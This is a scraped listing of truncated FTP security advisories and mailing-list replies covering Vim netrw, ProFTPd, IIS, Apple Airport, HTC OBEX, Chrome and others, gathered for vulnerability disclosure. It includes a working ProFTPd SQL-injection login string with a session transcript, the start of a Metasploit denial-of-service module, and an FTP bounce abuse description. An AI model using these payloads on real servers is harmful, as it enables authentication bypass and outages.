ftp

Re: Vim: Netrw: FTP User Name and Password Disclosure

On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product  : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact   : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html

Vim: Netrw: FTP User Name and Password Disclosure

Vim: Netrw: FTP User Name and Password Disclosure

1. SUMMARY

Product  : Vim -- Vi IMproved
Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
Impact   : Credentials disclosure
Wherefrom: Remote
Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html


[HISPASEC] 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities

HISPASEC
Security Advisory
http://blog.hispasec.com/lab/

Name         : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class        : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered   : 2007-09-06
Published    : 2007-08-24
Credit       : Gynvael Coldwind

Apple Airport Wireless Products: Promiscuous FTP PORT Allowed in FTP Proxy Provides Security Bypass

The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports.  (The FTP PORT command is used by an FTP client to tell an FTP server which address and data port to initiate the data connection on.)  The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products.  FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode.  The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command.  It looks like it might be ftp-proxy from PF.

The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports.  This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client.  This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness.  Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation.  Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.

Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping.  If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.

Apple likes to keep secrets for the protection of its customers.  Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects.  Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released.  This is confidential information.  DO NOT DISCLOSE!

Advisory history:


Web commands injection through FTP Login in Synology Disk Station - CVE-2010-2453

Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453


INTRODUCTION

Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal 

[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS

|------------------------------------------------------------------|

Advisory        : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/


0x00 : Vulnerability information
--------------------------------


[HISPASEC] 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP Client Directory Traversal

HISPASEC
Security Advisory
http://blog.hispasec.com/lab/

Name         : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP
Client Directory Traversal
Class        : Remote Directory Traversal
Threat level : HIGH
Discovered   : 2007-08-14
Published    : 2007-09-06

[HISPASEC] 2K7SEPT6 Total Commander 7.01 Remote FTP Client Directory Traversal

HISPASEC
Security Advisory
http://blog.hispasec.com/lab/

Name         : 2K7SEPT6 Total Commander 7.01 Remote FTP Client
Directory Traversal
Class        : Remote Directory Traversal
Threat level : HIGH
Discovered   : 2007-08-25
Published    : 2007-09-06

[Security] XM Easy Personal FTP Server Multiple DoS vulnerabilities

XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos      

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'XM Easy Personal FTP Server 5.8.0 Type  DoS',

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).

220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select

Microsoft FTP Client Multiple Bufferoverflow Vulnerability

Microsoft FTP Client Multiple Bufferoverflow
Vulnerability

#####################################################################

XDisclose Advisory      : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported       : November 28th 2007
Credit                  : Rajesh Sethumadhavan


Re: Summary of AS/400 Vulnerability Information

        http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html

5) Comments of note:

> ... some default services on AS/400 allow
> anonymous access including POP3, SMTP, LDAP, FTP, etc.  But what
> fails audit almost every time are default passwords. 

> ... security of these beasts had not been in forefront for
> most companies.  Some of them run their e-commerce solutions on AS/400
> facing the Internet

HTC / Android OBEX FTP Service Directory Traversal Vulnerability

Title: HTC / Android OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Products:
- HTC devices running Android 2.1
- HTC devices running Android 2.2
References: http://www.seguridadmobile.com/android/android-security/HTC-Android-OBEX-FTP-Service-Directory-Traversal.html

Summary:
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.

iDefense Security Advisory 10.30.07: IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability

IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability

iDefense Security Advisory 10.30.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 30, 2007

I. BACKGROUND

The ftp program is a client application for accessing data stored on FTP
servers. This client is responsible for interfacing with users and

MITKRB5-SA-2011-005 FTP daemon fails to set effective group ID [CVE-2011-1526]

MITKRB5-SA-2011-005

MIT krb5 Security Advisory 2011-005
Original release: 2011-07-05

Topic: FTP daemon fails to set effective group ID

CVE-2011-1526

CVSSv2 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P/E:H/RL:O/RC:C


TurboFTP Server Directory Traversal Vulnerability

Credits:
leinakesi[at]gmail.com

Vendor: 
Turbo FTP Server

Affected:
Turbo FTP Server 1.20.745. 
Earlier versions may also be affected.


Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities

Credits:
leinakesi[at]gmail.com

Vendor: 
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html

Affected:
Core FTP mini-sftp-server version 1.19. 
Earlier versions may also be affected.

Core FTP Server(SFTP module) 'open' and 'stat' Commands Remote Denial of Service Vulnerability

Credits:
leinakesi[at]gmail.com

Vendor: 
Core FTP

Affected:
Core FTP Server 1.0 build 347. 
Earlier versions may also be affected.


Home FTP Server 'MKD' Command Directory Traversal Vulnerability

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor:
Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html

Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected


[security bulletin] HPSBUX02334 SSRT071403 rev.1 - HP-UX Running ftp, Remote Denial of Service (DoS)

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01446326
Version: 1

HPSBUX02334 SSRT071403 rev.1 - HP-UX Running ftp, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-05-12
Last Updated: 2008-05-12

FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd

including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

lukemftpd(8) is a general-purpose implementation of File Transfer Protocol
(FTP) server that is shipped with the FreeBSD base system.  It is not enabled
in default installations but can be enabled as either an inetd(8) server,
or a stand-alone server.

A cross-site request forgery attack is a type of malicious exploit that is

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Hi,

On Tue, 2009-02-10 at 19:49 +0000, gat3way@gat3way.eu wrote:
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.

> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 
> 

Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

Version Affected:
Google Chrome: 1.0.154.36

Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port
scanning vulnerability. The username in the
FTP (ftp://username:password@domain.com) can be manipulated by tampering
it with certain IP address with

3proxy 0.5.3j released (bugfix)

bandwidths,    convert   requests   between   different   proxy   types,
authenticate,  authorize,  control,  limit  and account users access and
more.

3proxy   0.5.3j   version   was   released,  to  address  double  free()
vulnerability  in  FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622).  Vulnerable  3proxy  versions are 0.5 - 0.5.3i. Current
branch (0.6) is not affected.

3proxy 0.5.3j can be downloaded from http://3proxy.ru/download/


ERRATA - n.runs-SA-2008.001 - Jscape Secure FTP Applet

____________________________________________________________________________

Vendor:             Jscape, http://www.jscape.com/
Affected Products:  Jscape Secure FTP Applet
                    http://www.jscape.com/sftpapplet/index.html
Vulnerability:      SSH Host key is not verified allowing 
                          man-in-the-middle attacks
Risk:               Medium
____________________________________________________________________________

XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" command is sent to the FTP server if you do not use "PASV" or "POST" first.


Cisco Security Response: Multiple Vulnerabilities in Cisco Unified Videoconferencing Products

UVC products.

This issue is documented in Cisco bug ID CSCti54010 and has not been
assigned a CVE ID.

FTP Server Accessible by Default in Cisco UVC Products
+-----------------------------------------------------

The FTP server is enabled by default on Cisco UVC systems. An
attacker can leverage the FTP server to exploit other vulnerabilities
in this Cisco Security Response. Authentication is required to log

Microsoft Internet Information Services 5.0/6.0 FTP SERVER DENIAL OF SERVICE ("Stack Exhaustion")

***** MS IIS FTPD DoS ZER0DAY *****

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

Example session where the anonymous user has read access to the folder "pub":

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.

[security bulletin] HPSBUX02334 SSRT071403 rev.2 - HP-UX Running ftp, Remote Denial of Service (DoS)

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01446326
Version: 2

HPSBUX02334 SSRT071403 rev.2 - HP-UX Running ftp, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-05-12
Last Updated: 2008-05-28
